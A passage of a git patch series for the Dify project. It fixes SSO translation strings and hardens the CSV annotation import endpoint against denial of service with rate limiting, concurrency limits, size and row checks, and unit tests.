From 714b4430771f1b940f6285941b3c9b7cc80f7f1f Mon Sep 17 00:00:00 2001 From: NeatGuyCoding <15627489+NeatGuyCoding@users.noreply.github.com> Date: Mon, 15 Dec 2025 14:58:33 +0800 Subject: [PATCH 01/16] fix: correct i18n SSO translations and fix validation/type issues (#29564) Signed-off-by: NeatGuyCoding <15627489+NeatGuyCoding@users.noreply.github.com> Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- api/controllers/service_api/app/completion.py | 3 +++ api/core/entities/knowledge_entities.py | 12 ++++++++++-- web/i18n/th-TH/billing.ts | 2 +- web/i18n/uk-UA/billing.ts | 2 +- 4 files changed, 15 insertions(+), 4 deletions(-) diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/web/i18n/th-TH/billing.ts b/web/i18n/th-TH/billing.ts index 8d8273bdce..7c55baba60 100644 --- a/web/i18n/th-TH/billing.ts +++ b/web/i18n/th-TH/billing.ts @@ -137,7 +137,7 @@ const translation = { name: 'กิจการ', description: 'รับความสามารถและการสนับสนุนเต็มรูปแบบสําหรับระบบที่สําคัญต่อภารกิจขนาดใหญ่', includesTitle: 'ทุกอย่างในแผนทีม รวมถึง:', - features: ['โซลูชันการปรับใช้ที่ปรับขนาดได้สำหรับองค์กร', 'การอนุญาตใบอนุญาตเชิงพาณิชย์', 'ฟีเจอร์เฉพาะสำหรับองค์กร', 'หลายพื้นที่ทำงานและการจัดการองค์กร', 'ประกันสังคม', 'ข้อตกลง SLA ที่เจรจากับพันธมิตร Dify', 'ระบบความปลอดภัยและการควบคุมขั้นสูง', 'การอัปเดตและการบำรุงรักษาโดย Dify อย่างเป็นทางการ', 'การสนับสนุนทางเทคนิคระดับมืออาชีพ'], + features: ['โซลูชันการปรับใช้ที่ปรับขนาดได้สำหรับองค์กร', 'การอนุญาตใบอนุญาตเชิงพาณิชย์', 'ฟีเจอร์เฉพาะสำหรับองค์กร', 'หลายพื้นที่ทำงานและการจัดการองค์กร', 'ระบบลงชื่อเพียงครั้งเดียว (SSO)', 'ข้อตกลง SLA ที่เจรจากับพันธมิตร Dify', 'ระบบความปลอดภัยและการควบคุมขั้นสูง', 'การอัปเดตและการบำรุงรักษาโดย Dify อย่างเป็นทางการ', 'การสนับสนุนทางเทคนิคระดับมืออาชีพ'], btnText: 'ติดต่อฝ่ายขาย', price: 'ที่กำหนดเอง', for: 'สำหรับทีมขนาดใหญ่', diff --git a/web/i18n/uk-UA/billing.ts b/web/i18n/uk-UA/billing.ts index 76207fcec5..94bf0b0214 100644 --- a/web/i18n/uk-UA/billing.ts +++ b/web/i18n/uk-UA/billing.ts @@ -137,7 +137,7 @@ const translation = { name: 'Ентерпрайз', description: 'Отримайте повні можливості та підтримку для масштабних критично важливих систем.', includesTitle: 'Все, що входить до плану Team, плюс:', - features: ['Масштабовані рішення для розгортання корпоративного рівня', 'Авторизація комерційної ліцензії', 'Ексклюзивні корпоративні функції', 'Кілька робочих просторів та управління підприємством', 'ЄД', 'Узгоджені SLA партнерами Dify', 'Розширена безпека та контроль', 'Оновлення та обслуговування від Dify офіційно', 'Професійна технічна підтримка'], + features: ['Масштабовані рішення для розгортання корпоративного рівня', 'Авторизація комерційної ліцензії', 'Ексклюзивні корпоративні функції', 'Кілька робочих просторів та управління підприємством', 'ЄДИНА СИСТЕМА АВТОРИЗАЦІЇ', 'Узгоджені SLA партнерами Dify', 'Розширена безпека та контроль', 'Оновлення та обслуговування від Dify офіційно', 'Професійна технічна підтримка'], btnText: 'Зв\'язатися з відділом продажу', priceTip: 'Тільки річна оплата', for: 'Для великих команд', From 724cd57dbfcf51deaccbdc8789ed051d79696cb2 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 15:22:04 +0800 Subject: [PATCH 02/16] fix: dos in annotation import (#29470) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/.env.example | 11 + api/configs/feature/__init__.py | 31 ++ api/controllers/console/app/annotation.py | 31 +- api/controllers/console/wraps.py | 88 +++++ api/services/annotation_service.py | 123 ++++++- .../batch_import_annotations_task.py | 11 + .../console/app/test_annotation_security.py | 344 ++++++++++++++++++ docker/.env.example | 11 + docker/docker-compose.yaml | 6 + 9 files changed, 643 insertions(+), 13 deletions(-) create mode 100644 api/tests/unit_tests/controllers/console/app/test_annotation_security.py diff --git a/api/.env.example b/api/.env.example index fb92199893..8c4ea617d4 100644 --- a/api/.env.example +++ b/api/.env.example @@ -670,3 +670,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 \ No newline at end of file diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index 5c0edb60ac..b9091b5e2f 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. " diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..0aed36a7fd 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -314,18 +316,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +344,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. " + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..4654650c77 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -331,3 +331,91 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..f750186ab0 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,6 +1,9 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound @@ -330,6 +333,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +356,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." + ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +438,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..36da3c264e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,344 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Create invalid CSV content + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error message + assert "error_msg" in result + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/docker/.env.example b/docker/.env.example index 0227f75b70..8be75420b1 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -1448,5 +1448,16 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude AMPLITUDE_API_KEY= diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 71c0a5e687..cc17b2853a 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -648,6 +648,12 @@ x-shared-env: 